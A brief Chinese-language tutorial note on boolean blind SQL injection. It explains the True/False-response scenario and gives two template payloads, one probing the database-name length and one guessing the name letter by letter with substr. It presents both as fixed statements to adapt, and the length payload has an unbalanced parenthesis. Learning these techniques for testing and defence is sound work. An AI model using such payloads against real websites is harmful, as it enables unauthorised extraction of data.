布尔盲注 典型应用场景:Web页面仅仅返回类似True或False的两种结果。 注入方式:进行SQL注入之后,根据页面返回的True或者是False来得到数据库中 的相关信息。 判断数据库名长度 and length(select database())=8)--+ 获取数据库名(逐个字母盲猜) and substr((select database()),1,1)='s'--+ 总结:语句固定,需要的话直接改里面的特定语句就行了。